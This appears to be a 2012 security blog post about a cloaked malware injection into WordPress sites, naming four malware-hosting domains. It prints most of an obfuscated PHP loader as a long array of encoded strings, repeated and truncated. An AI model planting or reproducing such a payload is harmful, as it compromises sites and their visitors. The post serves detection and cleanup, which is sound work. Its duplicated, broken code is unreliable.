Malware hosted enema.at.tc/top2.html, onbent-goga.r.gd/top2.html, gemeni.info.ms/top2.html, gemenia-electric.r.gd/top2.html
31 May 2012
A large number of WordPress sites have turned up over the last few days with this JavaScript hack. The hack consists of a block of obfuscated script inserted into the <head></head> section of the sites pages. The hack is cloaked and does not show up every time a page from the site is requested. If you do not see the code with the File Viewer Tool suggest you try checking your homepage with Rex Swain HTTP Viewer. When visible the block of code will look similar to this.
<scr
The code is written by a block of obfuscated php code hidden in one of the files on the site. The php code sets a cookie the first time a page on the site is visited and the code will not be inserted if the cookie is detected. The page will trigger a malware warning the first time the site owner checks it but when they check again no warning.
The php code will be similar to this
$lqxizr = array(“eNqtWgl32siy/iuMT05sXjyOWg”,”ugccjFjsHGsWDAgIGZHA4I2SzC”,
”cFjCkuS/v+6q6tYCduZObhKQ1K”,”r+urq2riqSGD4mTn57XD27y+H0?,
”ueNthovl4uR4qx0nk4lvCfkisd”,”VO3gyT3950sxfzeXd7cnycODuu”,
”Pdjikuo+bBYtcXef0e5G4ubiSX”,”x/vhbfpa+95uWgf+0PxVPvup4u”,”5lkNyOv1p/IncWeuy9tLcdPsPl”, ”jiOu4Z/Z24KeatevGqtXLEw6dx”,”9vj02NUL4mHSbtjLnl71+VDPEC”,”OXfs+3YZVWs+S3r31xu+WvuzdV”, ”cau5V+Iy/XonLmvxlRWA/F9xK5?,”4yI357t5aD4h8fRWoYDN1WHkqj”,”dhOY1u7qm0Fv0meth75fHnI2ho”, ”yJF+52/dR+MNNuTVvfjeow+aoC”,”PACEDvJb9WA7jRGX0dceyG6BF”,”S6+Np8BSi4r5c+PWmf+VTYSGVa”, ”Auk9AUOf8PKnGLm+ha0XQWiws3?,”e4nzttIx4BsqUXNHHtPtir5tX0?,”K20XVHNtj1rN6qynmynQAihVCe”, ”yqghdiAlZ5UlLjT7dDxygNWyOn”,”lt/cgkYcUGsZ1A62MiqrxdxJcZ”,”eHreKcC8bnA598/gTWB1vIbxzY”, ”TGtUqj2J1WrXIEBgFYxLsHt6XG”,”0AD/ewACsKSq4rF5Q3KmqwcGO9?,”egDQ1hIYa7Ce80mzmnxcPD/sLp”, ”blBohnLqbvQKDu3SivNT9ZPede”,”A4NpAtQCFHtX8/tiGsKJb4ZL+g”,”swNf5eXPqf0X5Ku6qLzpIHqJLg”, ”SNzsQM5i9TksJbi6X+AmGnxKA8?,”wF/AEkq7FmMJWmiYfoVHgtVmzj”,”RvyA6c9MyCJYFVbqi71anCmw0E”, ”AksGJoBXhWq4BEb13lNSNnzfcA”,”qglIl2J1KRIpDmc3gGElJWRqic”,”riTAlpC3GAsQkYcQOrOjUwT64Y”, ”c+OAQTVI1+0IJISkdRasmE8rA2?,”kJmR3lDcdfr9AmhZiK21Lg6w7p”,”ia8AZupcXZI5wMpMKQQC03rljP”, ”ImeUJpV0BSYAisXAfkhiQt7oDx”,”XQVWArILCwUMq8l7sBJnB3sJST”,”iVqtX1N5gZdBhcVNigQ6dGvhe”, ”SCmgOzkN9XdJIhlvBGNgzrRfHC”,”8yskV8hHAN5sXJdSFFZ1TZooWT”,”lEB6lkOM8NcgBtg2Tg8Jeaf8io”, ”RduhL6yDNOvisHMcipjVlTxTfT”,”woWLVmhsqwwft8VD8FosWobA5Y”,”OFOxjKUO55U8q6XCBjuBoQ/2OL”, ”5MplKHjZAPIoLJhbIe81kZWvP”,”DuIR4jjxDQhLVund1FoK22NKed”,”I80IrNFlKKhKSEgmbAMsjpPVXE”, ”ADmMBoMVo4O5IlCJPbwqpcq+Br”,”5RRSr5uIDcPiGJbJ7relqzx4zl”,”VByG6nFmyELcxl6KsgSMO5iBol”, ”CE0otEW2be5KhTVNdTSBDmL3pc”,”do5QYxM6qDp5RGY2WviBbew45b”,”2cppLPS72gA2h4Exz0MXw2gA+/”, ”JlNEBRgMfvlIHWfOEZG4ir0YMA”,”+Byp09BCc2pILa/LJL3gIIB46o”,”BLoz3j/lQIkMcSE4wHDF/IUByL”, ”CKY4J5yRY6JaIcgDJyB0DMM8/O”,”ioA2FiPjHn7EJ6sR52LRlb5RQg”,”V+4iFeAYfJyTP8nzIUIO6A45nS”, ”CDfCSKDJJR5EHkgpC1Cbm7hVtv”,”HV5J+iwED0bS1KRO0FjkttHbgL”,”mKLiWl6IJjEdWZJxK5fbl1yLg2?, ”UmJ4BrYOi6BOwpV7eJJHpTTVuB”,”hwhboRDmGUkES2T/tSDFL8p+lK”,”8Mjc/qpqH0o0O2lnFIgs9Ckn7A”, ”jwmkFk2e3lIOC8IgCZ6BtMHrL8?,”KFfRuTSSsR9IiTMMRxfTgGVBg”,”nRLeVXFNpqpPF9UhGdwfd5PC2J”, ”CA33kBAgI+GjGxY1ZGDHsCbiV2?,”VNhmI6T7GDEyKjDEAgOBG5lf0A”,”M3WIwaWrlkovuQ9TNATSUk3lFl”, ”uHagoQO8h47RTkaQgMkj+blPYW”,”lfZqSksYPa4gM9PKMmjyfQQ5kK”,”WEh2TKGMrhqI4upKkVxuE0g580?, ”bRnOmEP7kbYCK6lTcoN7cbaSd1?,”Sbg2eEOmORAUDJG2SFm3ItT7nb”,”NnzYR8+IoiHd3HkKHfyV8CGPZ/”,”FoEE7IkAy0tKYFjfDZVpKZIZ4F”,”4bScpxVwmJZqIl/Ib0riyN6Nw”,”bBNWYSqomo8tgYa9EUlTzmFjON”, ”gqo6V5E0TuQMYtuVkPdg+o2a40?,”f21WUobhZ3pcBg8fB5YlIl3D7C”,”yCg89Msg8W1I29iVVA5BkVjmET”, ”XITAI/BIbWIn9Am3FYNCOn5B7q”,”O5WZl2timms1w6EVZSqD3RrPI”,”sjTKIbPGlBpjVAKTZidQHtJwh0?, ”gFyGPYEFGJJRgCRGI6clHOdWcM”,”o0wJdVnMQsDIV96Up1OUoULem7?,”QQaGKRaor1aQlePWaYQRHeXTpZ”, ”qTDafUlNeD6XGXCaoONzhNoBjZ”,”OiMVpnaCvCSzRDxohLpKEdtpoZ”,”eB4zGllpqw0IqmcobQQjXMNUuj”, ”cDZb2cnKwMGDA0UtSdVJvY4k44?,”L8IqLk7k1Vc6NDbd3+2sa+hw+9?,”HrhlwNAzKEpQ9QC4tGpNbBHGWt”, ”AkwFvjdtDX11L8LjaGoDvQhnZU”,”Q1QF7sQe9gylpO6N+K6CAFxsWi”,”26D41VwLcsWU0tj1cGpP1wMR”, ”crsP1tgDe79cYBsFil9IPVrA36?,”2Il33Ygb1t30CpsG03eZWFy4Iy”,”9AGGrgk2Zvo30NDqG33DNaooyc”, ”Db3RtQg9YFJu2VoGzCkoueaLCd”,”ouPTRntB7i3eCkxxe+OvvKjQ+7?,”D//qylNxbtpgqh7gRsd9mabDgT”, ”Kjp5DzC8al83RJUL3ntz6/cmFY”,”UH+vC3/aYjRdx7KCz6emHbjhap”,”KJ2+T5J+LDR20KBoUhNhDEs9t7?, ”EriBZ6NeuppPHGeWqC7dkZ0EEl”,”GkROj5v+cnDXnF2C+TdmfW9XXz”,”wGkfYO21Z30EkxxW193Kg26o1a”, ”o2CrHL0+hgq1DRq2RJPwvlCFdl”,”69YBdrrFQXjTejbtOuGnh6Vvgj”,”3jZK9aBybeQhdlaqef9eNRqpf+”, ”ZG2mhoi/66XVHpQ191J3tkA70b”,”VUIDS+NGqQYLgPUUmlohXy1APi”,”GYBpKC3ahrDRWrQZIaSPqmWgdJ”, ”1yWaVrpXdI3LelMD9dzW8o1ypc”,”4KQaMU2XvABJ91kU0gfqiK1iK3?,”rbHqoAatV7l80Jdpo28PWiQRo7?, ”olqfSvGysgaCnafP+hXwm5R1Xr”,”Bo5aDmz2LuiT3m0tsKNe8wIfQa”,”kaPUZlzGkhmrUeIKxPSRH316rp”, ”gQ7BxvLIurpYO7i6uIUh6jDUeM”,”53Edk4DAWqxVD8tI6VzI4YQqp+”,”IKVIjxNEXiQKiFiVcEsYcrdgaW”, ”k4IIQbMJy+AcHpsXvdgGjUDoRI”,”QcpvgacuHznpI7gaJ22DzdiLnm”,”pWF8bHyfO5t1zNnxO97sJLmZ2+”, ”50773smb7l9vhl+S5z8SPxLDxw”,”O/ObgDzx131rPOwOv2O/602z9O”,”Jr+pXyD2X58kvx0GcqMT3ZM323?, ”JHS34TF5bdaida8pzP3J+4mvud”,”4fNwKeYLYj2rhk6S53C/8JbT2R”,”IQ9dNP9epd+c9ah19OcY1XiG7y”, ”F1f56ul8unrucw5eI60VnXy5Xp”,”O079JnVvjz6txqvlavlmrVi9J9?,”IVjunXamW7GvV2Hq9/nqxXW+VI”, ”ONMRDYbyc5LorOk7c84UJkyeT3?,”7+EBPcn/fMu9jFko392VH+7Kny”,”5qxXIpxJoR+fPzAc75j1fWcS6a”, ”1fxVsXofWiIV/pP++QBfQoAaaA”,”HexkMr0klmrj9deHKEiwZoE79l”,”s4nHrr/wkt/IB2D8/McPjw8mDt”, ”nc42Lqjqcz71nY3JM/7XV9mGTC”,”8lp2sZx35t7M77qekLGRPOXfZl”,”KaG4eczb2nzqS7dAeCwEqeHsG7?, ”I7JhKwuPBJfzNjNfuCMnTSkUfA”,”fff0n7/HKOs8MMAIVgII1TLTQL”,”uE18/57AGy4ETpJR6/MHmytMPK”, ”Sy3FYG08Wyt33uTgiQvxPi+fYK”,”gQJiGiGls0pyQJRSus5oyFwGvm”,”01br0TFs+343Unwm46y+HEm67Q”, ”eNIxMlJpmoKGlj26ztdofze12p”,”/v2Zn29/zv56NzfJ84yx7dcLb/”,”AJq9V1Xv0Zt78z8Sg+Vy9sf790?, ”AEaDFKITnGkqGp9YU3//3iyXsm”,”bHZoBjfCx9mK2xPuBV8mz9eDoe”,”/xCOlN5XZoP0xMfOSiXsR2n2H2?, ”mf7St3C7x8Dy08Qmi1gVM1D8jC”,”lQ9o6ROzE9i+9CZkaiNok1PQv2?,”a37ozRPvP+L338/46gh1z2libs”, ”FM8Atm0dqBUwZLcRcXcc9KfqGV”,”jBgvnMsvIVPk7wVkim9aYhlSfD”,”jTCFPTmA7UUZ9kaXJKvgPSQNQT”, ”WSbg+4Av/psI+eWAwzP7H3i8GZ”,”etroFsdRblkZlCPDo97c+SZmCe”,”onZlVqCOYxJeKFAyxiMljnruYC”, ”osW+cTeahcihcHD/u+t7yMHPdi”,”ALVlIQMpUlo624X/uiBQLdxSCi”,”9pvGTwYsPFwF0bDC86XjD8Gmht”, ”BqIYiGIgioEoBqKYiGIiiokoJg”,”VxRDERxUQUE1FMRDERxUIUC1Es”,”RLEQxUIUC1EsRLEQxUIUC1FSiJ”, ”JClBSipBAlhSgpREkhSgpRUoiS”,”QpQ0oqQRJY0oaURJI0oaUdKIkk”,”aUNKKkESWDKBlEySBKBlEyiJJB”, ”lAyiZBAlgygZRLERxUYUG1FsRL”,”ERxUYUG1FsRLERxUYUpml0ZXTV”,”6WrQlYKLZtE1JaNZJjAppqXpbY”, ”auhM4InRE6I3RG6DJ0MUJnKboS”,”HiM8RnjkjkwnPJ3wdMLTCY9snJ”,”GRM7JyRmbOyM4ZGTojS2dk6gyy”, ”LPSjLISzcLglD2CGDLgW0drZ5X”,”zlnT9O+SnLgx86XqK7AP/mrHMf”,”5gfh0/DkCAeOpI+Sk9pZyJ/Oe3?, ”z+OAi8djKCmFGILEDEZ8lOKBV7?,”FTjRfe7/hgCwoZTaUGxidEqChz”,”ufUg9O+yErQ7V+lrZiX3tI4ZBn”, ”n78Q2OaTzvyx88gP8Eh4C4Zxwz”,”pVKkZWjE1ETiNfyCNQN7MiTeoP”,”5/JN8htmBsCPyFrxhZXlwukrOl”, ”Ok8xLD4mSQavA49/ZtIjaWEWPD”,”RYgvsWt3MJn26TFIBsyU/HADWz”,”37w+exnMJlAelFiIXzH8vpivSu”, ”66e4V7okX5LdcujNI1ITAwiRwr”,”mYI3FfQOnZ2cmyM+d6PZGHYTh5?,”CSUwBh6aeobQgtzhzIx/eKKBcz”, ”A10NOxOeq9ns296fB6q5Gv/gXi”,”tOksNoyXVlNsfUkmzmbT9YmyP/”,”ybPI1lPSr74fR7rEdziZ88J78k”, ”ziDl0iTUHnv/Jl8hWZgxWZgiKQ”,”s5zP5i+pkV/oBE4jtkgunYoKHG”,”DvCftmJfCtbQaJYdvcpxgxFanP”, ”4n8C9SBwLXJaRx8q9FofNkPvb5?,”72TDODYLYRsmXfUX3XGxXYgeQW”,”fpTWYd7tsR14y/PFExx7BEMeg9?, ”f8UMn59HyXBVbZ0fpjP/IZ21R0?,”dEghNefJ50OoXiXb7TgZMOopUo”,”4HmEkxtDer6ZUBTjz9Jc+WZUDS”, ”uGZdynU+CwrLxNRDreBqdTEmuk”,”oSbhWSIU3pzR5VYSgNwO4HnQDs”,”upFoaBIdCg8o1DjqbDZ5QJ1SHi”, ”HeThhxAXA8/Hjohsk3GIXDAq+X”,”kFYbvgMgaupr3OYtmdi/ZaDofV”,”dInMSYR9uNNnrjs+nVPyIX6edV”, ”zf6z6fvLLQrLtYLAfz1d5S8sUv”,”LJbjx93cW0xXc2qMGJlsbqb6EV”,”zKIFEbmmIh3VlBXZ5ThbmRUUS8?, ”Ms89inOYXgSNCaaLD/S+ZkEVzq”,”cGPO1LYD51O9heevv2MMuSQrKN”,”KW28aM5+TAS5LlUizBItP7QYO7?, ”5NA0x0nyPYG3Cz/4qL41glJ2Hx”,”2KHYqcc/PBS9IDz7l04kJXndSo”,”U/QgOqoXdgF6Kt8ksb3GvUxjao”, ”+jY/k0uwA808y7z0DftBO4iZlY”,”xYg+XEX8w8d9j13UF3TouLIAH9?,”GFNDlZvUC+D5TvgI57UppjPx8Z”, ”RsOeixF2n5whBtheXUn64pf2Mq”,”qzUZNRoZL3Op9xgM2XLI1OUYr3?,”9lvH9e+f45nmuhCo4qY0alMaPa”, ”mFFxzKg6ZlQeM6qPGRXIjCpkRi”,”UyoxqZUZHM0gYeIb8NFwtvefKm”,”86lc/lzM/4UilDo2eQa0fyaqPq”, ”tpKrLw+WLKPgy2e00TU4a0GW6u”,”xl9S+zYXP9NMWbLwqiIXLSv48u”,”e5yVgm6CbVfWaKE0IQwead9X5+”, ”hHsW3pJ7XM+HSwLAuJhOw3hgb/”,”x8Pc8FBYMZKhjSEdf82bPAxZIh”,”xEqsbMgFNYVpvvbSir/ck1ewSP”, ”K/Ugy41w9MsbKHU6wg1drLzzLY”,”N/1V1R0WuMVY8ldkhDGBH6b97h”,”LbBWmbyiczExrNaHLUzkoxIhG2?, ”ty1NDS+5H0ReYUllZn7/hQCPES”,”D9YkGnW7GvvWKLnaXin6Dw0g+U”,”WhqPubHPa1XIgZNgP6EXpRMcRA”, ”esUsrNYkc8IKK+0omPGBAzTFby”,”fOwDjenJA4TGAULzEKF1gDAFvw”,”rG+hZgfTy5PZpPEr/PHxPE7/8d”, ”Ybf9gGHbLxv2XhDCCRBoMj8LNM”,”EPREwTBdEL38mfGT2lhCLSdXvB”,”Lt++PbAZngN+/w6ji+HOk0MfQm”, ”YV+W3yJ88y87L0bM51T17udaiz”,”09Jl5yYDnZvYL/VAEe+g/VO5Wx”,”rK3d4P/EeIfPSqQvj8/4lCQi85?, ”ZFxbkL6FswEIWhbfY1QWqLpISU”,”Daoh8lTZSKtFEctKjTF25aWqZs”,”WvK8R5RqueV8iNUOH+CyxqSGVG”, ”lhH5W6lT+of5gLftw4JXKlUvjd”,”FRt65IPMFkMCh06mQ/5hay/oyW”,”R/Px/QlPxhhtmMhzf60cfr4v8I”, ”EC34WCPtXdpS/0JNNU3j63KAow”,”8Ldz6cLRPL7czLHi+9zfL9qPu1?,”i6PHH1ErH97j80fxy+ePH5Gs0z”, ”ZeT6py3X6/04U8HHmkbE78MhDn”,”9VASffpah4/LLvGfj/8PWGX41A”,”==”); echopreg_
”cFjCkuS/v+6q6tYCduZObhKQ1K”,”r+urq2riqSGD4mTn57XD27y+H0?,
”ueNthovl4uR4qx0nk4lvCfkisd”,”VO3gyT3950sxfzeXd7cnycODuu”,
”Pdjikuo+bBYtcXef0e5G4ubiSX”,”x/vhbfpa+95uWgf+0PxVPvup4u”,”5lkNyOv1p/IncWeuy9tLcdPsPl”, ”jiOu4Z/Z24KeatevGqtXLEw6dx”,”9vj02NUL4mHSbtjLnl71+VDPEC”,”OXfs+3YZVWs+S3r31xu+WvuzdV”, ”cau5V+Iy/XonLmvxlRWA/F9xK5?,”4yI357t5aD4h8fRWoYDN1WHkqj”,”dhOY1u7qm0Fv0meth75fHnI2ho”, ”yJF+52/dR+MNNuTVvfjeow+aoC”,”PACEDvJb9WA7jRGX0dceyG6BF”,”S6+Np8BSi4r5c+PWmf+VTYSGVa”, ”Auk9AUOf8PKnGLm+ha0XQWiws3?,”e4nzttIx4BsqUXNHHtPtir5tX0?,”K20XVHNtj1rN6qynmynQAihVCe”, ”yqghdiAlZ5UlLjT7dDxygNWyOn”,”lt/cgkYcUGsZ1A62MiqrxdxJcZ”,”eHreKcC8bnA598/gTWB1vIbxzY”, ”TGtUqj2J1WrXIEBgFYxLsHt6XG”,”0AD/ewACsKSq4rF5Q3KmqwcGO9?,”egDQ1hIYa7Ce80mzmnxcPD/sLp”, ”blBohnLqbvQKDu3SivNT9ZPede”,”A4NpAtQCFHtX8/tiGsKJb4ZL+g”,”swNf5eXPqf0X5Ku6qLzpIHqJLg”, ”SNzsQM5i9TksJbi6X+AmGnxKA8?,”wF/AEkq7FmMJWmiYfoVHgtVmzj”,”RvyA6c9MyCJYFVbqi71anCmw0E”, ”AksGJoBXhWq4BEb13lNSNnzfcA”,”qglIl2J1KRIpDmc3gGElJWRqic”,”riTAlpC3GAsQkYcQOrOjUwT64Y”, ”c+OAQTVI1+0IJISkdRasmE8rA2?,”kJmR3lDcdfr9AmhZiK21Lg6w7p”,”ia8AZupcXZI5wMpMKQQC03rljP”, ”ImeUJpV0BSYAisXAfkhiQt7oDx”,”XQVWArILCwUMq8l7sBJnB3sJST”,”iVqtX1N5gZdBhcVNigQ6dGvhe”, ”SCmgOzkN9XdJIhlvBGNgzrRfHC”,”8yskV8hHAN5sXJdSFFZ1TZooWT”,”lEB6lkOM8NcgBtg2Tg8Jeaf8io”, ”RduhL6yDNOvisHMcipjVlTxTfT”,”woWLVmhsqwwft8VD8FosWobA5Y”,”OFOxjKUO55U8q6XCBjuBoQ/2OL”, ”5MplKHjZAPIoLJhbIe81kZWvP”,”DuIR4jjxDQhLVund1FoK22NKed”,”I80IrNFlKKhKSEgmbAMsjpPVXE”, ”ADmMBoMVo4O5IlCJPbwqpcq+Br”,”5RRSr5uIDcPiGJbJ7relqzx4zl”,”VByG6nFmyELcxl6KsgSMO5iBol”, ”CE0otEW2be5KhTVNdTSBDmL3pc”,”do5QYxM6qDp5RGY2WviBbew45b”,”2cppLPS72gA2h4Exz0MXw2gA+/”, ”JlNEBRgMfvlIHWfOEZG4ir0YMA”,”+Byp09BCc2pILa/LJL3gIIB46o”,”BLoz3j/lQIkMcSE4wHDF/IUByL”, ”CKY4J5yRY6JaIcgDJyB0DMM8/O”,”ioA2FiPjHn7EJ6sR52LRlb5RQg”,”V+4iFeAYfJyTP8nzIUIO6A45nS”, ”CDfCSKDJJR5EHkgpC1Cbm7hVtv”,”HV5J+iwED0bS1KRO0FjkttHbgL”,”mKLiWl6IJjEdWZJxK5fbl1yLg2?, ”UmJ4BrYOi6BOwpV7eJJHpTTVuB”,”hwhboRDmGUkES2T/tSDFL8p+lK”,”8Mjc/qpqH0o0O2lnFIgs9Ckn7A”, ”jwmkFk2e3lIOC8IgCZ6BtMHrL8?,”KFfRuTSSsR9IiTMMRxfTgGVBg”,”nRLeVXFNpqpPF9UhGdwfd5PC2J”, ”CA33kBAgI+GjGxY1ZGDHsCbiV2?,”VNhmI6T7GDEyKjDEAgOBG5lf0A”,”M3WIwaWrlkovuQ9TNATSUk3lFl”, ”uHagoQO8h47RTkaQgMkj+blPYW”,”lfZqSksYPa4gM9PKMmjyfQQ5kK”,”WEh2TKGMrhqI4upKkVxuE0g580?, ”bRnOmEP7kbYCK6lTcoN7cbaSd1?,”Sbg2eEOmORAUDJG2SFm3ItT7nb”,”NnzYR8+IoiHd3HkKHfyV8CGPZ/”,”FoEE7IkAy0tKYFjfDZVpKZIZ4F”,”4bScpxVwmJZqIl/Ib0riyN6Nw”,”bBNWYSqomo8tgYa9EUlTzmFjON”, ”gqo6V5E0TuQMYtuVkPdg+o2a40?,”f21WUobhZ3pcBg8fB5YlIl3D7C”,”yCg89Msg8W1I29iVVA5BkVjmET”, ”XITAI/BIbWIn9Am3FYNCOn5B7q”,”O5WZl2timms1w6EVZSqD3RrPI”,”sjTKIbPGlBpjVAKTZidQHtJwh0?, ”gFyGPYEFGJJRgCRGI6clHOdWcM”,”o0wJdVnMQsDIV96Up1OUoULem7?,”QQaGKRaor1aQlePWaYQRHeXTpZ”, ”qTDafUlNeD6XGXCaoONzhNoBjZ”,”OiMVpnaCvCSzRDxohLpKEdtpoZ”,”eB4zGllpqw0IqmcobQQjXMNUuj”, ”cDZb2cnKwMGDA0UtSdVJvY4k44?,”L8IqLk7k1Vc6NDbd3+2sa+hw+9?,”HrhlwNAzKEpQ9QC4tGpNbBHGWt”, ”AkwFvjdtDX11L8LjaGoDvQhnZU”,”Q1QF7sQe9gylpO6N+K6CAFxsWi”,”26D41VwLcsWU0tj1cGpP1wMR”, ”crsP1tgDe79cYBsFil9IPVrA36?,”2Il33Ygb1t30CpsG03eZWFy4Iy”,”9AGGrgk2Zvo30NDqG33DNaooyc”, ”Db3RtQg9YFJu2VoGzCkoueaLCd”,”ouPTRntB7i3eCkxxe+OvvKjQ+7?,”D//qylNxbtpgqh7gRsd9mabDgT”, ”Kjp5DzC8al83RJUL3ntz6/cmFY”,”UH+vC3/aYjRdx7KCz6emHbjhap”,”KJ2+T5J+LDR20KBoUhNhDEs9t7?, ”EriBZ6NeuppPHGeWqC7dkZ0EEl”,”GkROj5v+cnDXnF2C+TdmfW9XXz”,”wGkfYO21Z30EkxxW193Kg26o1a”, ”o2CrHL0+hgq1DRq2RJPwvlCFdl”,”69YBdrrFQXjTejbtOuGnh6Vvgj”,”3jZK9aBybeQhdlaqef9eNRqpf+”, ”ZG2mhoi/66XVHpQ191J3tkA70b”,”VUIDS+NGqQYLgPUUmlohXy1APi”,”GYBpKC3ahrDRWrQZIaSPqmWgdJ”, ”1yWaVrpXdI3LelMD9dzW8o1ypc”,”4KQaMU2XvABJ91kU0gfqiK1iK3?,”rbHqoAatV7l80Jdpo28PWiQRo7?, ”olqfSvGysgaCnafP+hXwm5R1Xr”,”Bo5aDmz2LuiT3m0tsKNe8wIfQa”,”kaPUZlzGkhmrUeIKxPSRH316rp”, ”gQ7BxvLIurpYO7i6uIUh6jDUeM”,”53Edk4DAWqxVD8tI6VzI4YQqp+”,”IKVIjxNEXiQKiFiVcEsYcrdgaW”, ”k4IIQbMJy+AcHpsXvdgGjUDoRI”,”QcpvgacuHznpI7gaJ22DzdiLnm”,”pWF8bHyfO5t1zNnxO97sJLmZ2+”, ”50773smb7l9vhl+S5z8SPxLDxw”,”O/ObgDzx131rPOwOv2O/602z9O”,”Jr+pXyD2X58kvx0GcqMT3ZM323?, ”JHS34TF5bdaida8pzP3J+4mvud”,”4fNwKeYLYj2rhk6S53C/8JbT2R”,”IQ9dNP9epd+c9ah19OcY1XiG7y”, ”F1f56ul8unrucw5eI60VnXy5Xp”,”O079JnVvjz6txqvlavlmrVi9J9?,”IVjunXamW7GvV2Hq9/nqxXW+VI”, ”ONMRDYbyc5LorOk7c84UJkyeT3?,”7+EBPcn/fMu9jFko392VH+7Kny”,”5qxXIpxJoR+fPzAc75j1fWcS6a”, ”1fxVsXofWiIV/pP++QBfQoAaaA”,”HexkMr0klmrj9deHKEiwZoE79l”,”s4nHrr/wkt/IB2D8/McPjw8mDt”, ”nc42Lqjqcz71nY3JM/7XV9mGTC”,”8lp2sZx35t7M77qekLGRPOXfZl”,”KaG4eczb2nzqS7dAeCwEqeHsG7?, ”I7JhKwuPBJfzNjNfuCMnTSkUfA”,”fff0n7/HKOs8MMAIVgII1TLTQL”,”uE18/57AGy4ETpJR6/MHmytMPK”, ”Sy3FYG08Wyt33uTgiQvxPi+fYK”,”gQJiGiGls0pyQJRSus5oyFwGvm”,”01br0TFs+343Unwm46y+HEm67Q”, ”eNIxMlJpmoKGlj26ztdofze12p”,”/v2Zn29/zv56NzfJ84yx7dcLb/”,”AJq9V1Xv0Zt78z8Sg+Vy9sf790?, ”AEaDFKITnGkqGp9YU3//3iyXsm”,”bHZoBjfCx9mK2xPuBV8mz9eDoe”,”/xCOlN5XZoP0xMfOSiXsR2n2H2?, ”mf7St3C7x8Dy08Qmi1gVM1D8jC”,”lQ9o6ROzE9i+9CZkaiNok1PQv2?,”a37ozRPvP+L338/46gh1z2libs”, ”FM8Atm0dqBUwZLcRcXcc9KfqGV”,”jBgvnMsvIVPk7wVkim9aYhlSfD”,”jTCFPTmA7UUZ9kaXJKvgPSQNQT”, ”WSbg+4Av/psI+eWAwzP7H3i8GZ”,”etroFsdRblkZlCPDo97c+SZmCe”,”onZlVqCOYxJeKFAyxiMljnruYC”, ”osW+cTeahcihcHD/u+t7yMHPdi”,”ALVlIQMpUlo624X/uiBQLdxSCi”,”9pvGTwYsPFwF0bDC86XjD8Gmht”, ”BqIYiGIgioEoBqKYiGIiiokoJg”,”VxRDERxUQUE1FMRDERxUIUC1Es”,”RLEQxUIUC1EsRLEQxUIUC1FSiJ”, ”JClBSipBAlhSgpREkhSgpRUoiS”,”QpQ0oqQRJY0oaURJI0oaUdKIkk”,”aUNKKkESWDKBlEySBKBlEyiJJB”, ”lAyiZBAlgygZRLERxUYUG1FsRL”,”ERxUYUG1FsRLERxUYUpml0ZXTV”,”6WrQlYKLZtE1JaNZJjAppqXpbY”, ”auhM4InRE6I3RG6DJ0MUJnKboS”,”HiM8RnjkjkwnPJ3wdMLTCY9snJ”,”GRM7JyRmbOyM4ZGTojS2dk6gyy”, ”LPSjLISzcLglD2CGDLgW0drZ5X”,”zlnT9O+SnLgx86XqK7AP/mrHMf”,”5gfh0/DkCAeOpI+Sk9pZyJ/Oe3?, ”z+OAi8djKCmFGILEDEZ8lOKBV7?,”FTjRfe7/hgCwoZTaUGxidEqChz”,”ufUg9O+yErQ7V+lrZiX3tI4ZBn”, ”n78Q2OaTzvyx88gP8Eh4C4Zxwz”,”pVKkZWjE1ETiNfyCNQN7MiTeoP”,”5/JN8htmBsCPyFrxhZXlwukrOl”, ”Ok8xLD4mSQavA49/ZtIjaWEWPD”,”RYgvsWt3MJn26TFIBsyU/HADWz”,”37w+exnMJlAelFiIXzH8vpivSu”, ”66e4V7okX5LdcujNI1ITAwiRwr”,”mYI3FfQOnZ2cmyM+d6PZGHYTh5?,”CSUwBh6aeobQgtzhzIx/eKKBcz”, ”A10NOxOeq9ns296fB6q5Gv/gXi”,”tOksNoyXVlNsfUkmzmbT9YmyP/”,”ybPI1lPSr74fR7rEdziZ88J78k”, ”ziDl0iTUHnv/Jl8hWZgxWZgiKQ”,”s5zP5i+pkV/oBE4jtkgunYoKHG”,”DvCftmJfCtbQaJYdvcpxgxFanP”, ”4n8C9SBwLXJaRx8q9FofNkPvb5?,”72TDODYLYRsmXfUX3XGxXYgeQW”,”fpTWYd7tsR14y/PFExx7BEMeg9?, ”f8UMn59HyXBVbZ0fpjP/IZ21R0?,”dEghNefJ50OoXiXb7TgZMOopUo”,”4HmEkxtDer6ZUBTjz9Jc+WZUDS”, ”uGZdynU+CwrLxNRDreBqdTEmuk”,”oSbhWSIU3pzR5VYSgNwO4HnQDs”,”upFoaBIdCg8o1DjqbDZ5QJ1SHi”, ”HeThhxAXA8/Hjohsk3GIXDAq+X”,”kFYbvgMgaupr3OYtmdi/ZaDofV”,”dInMSYR9uNNnrjs+nVPyIX6edV”, ”zf6z6fvLLQrLtYLAfz1d5S8sUv”,”LJbjx93cW0xXc2qMGJlsbqb6EV”,”zKIFEbmmIh3VlBXZ5ThbmRUUS8?, ”Ms89inOYXgSNCaaLD/S+ZkEVzq”,”cGPO1LYD51O9heevv2MMuSQrKN”,”KW28aM5+TAS5LlUizBItP7QYO7?, ”5NA0x0nyPYG3Cz/4qL41glJ2Hx”,”2KHYqcc/PBS9IDz7l04kJXndSo”,”U/QgOqoXdgF6Kt8ksb3GvUxjao”, ”+jY/k0uwA808y7z0DftBO4iZlY”,”xYg+XEX8w8d9j13UF3TouLIAH9?,”GFNDlZvUC+D5TvgI57UppjPx8Z”, ”RsOeixF2n5whBtheXUn64pf2Mq”,”qzUZNRoZL3Op9xgM2XLI1OUYr3?,”9lvH9e+f45nmuhCo4qY0alMaPa”, ”mFFxzKg6ZlQeM6qPGRXIjCpkRi”,”UyoxqZUZHM0gYeIb8NFwtvefKm”,”86lc/lzM/4UilDo2eQa0fyaqPq”, ”tpKrLw+WLKPgy2e00TU4a0GW6u”,”xl9S+zYXP9NMWbLwqiIXLSv48u”,”e5yVgm6CbVfWaKE0IQwead9X5+”, ”hHsW3pJ7XM+HSwLAuJhOw3hgb/”,”x8Pc8FBYMZKhjSEdf82bPAxZIh”,”xEqsbMgFNYVpvvbSir/ck1ewSP”, ”K/Ugy41w9MsbKHU6wg1drLzzLY”,”N/1V1R0WuMVY8ldkhDGBH6b97h”,”LbBWmbyiczExrNaHLUzkoxIhG2?, ”ty1NDS+5H0ReYUllZn7/hQCPES”,”D9YkGnW7GvvWKLnaXin6Dw0g+U”,”WhqPubHPa1XIgZNgP6EXpRMcRA”, ”esUsrNYkc8IKK+0omPGBAzTFby”,”fOwDjenJA4TGAULzEKF1gDAFvw”,”rG+hZgfTy5PZpPEr/PHxPE7/8d”, ”Ybf9gGHbLxv2XhDCCRBoMj8LNM”,”EPREwTBdEL38mfGT2lhCLSdXvB”,”Lt++PbAZngN+/w6ji+HOk0MfQm”, 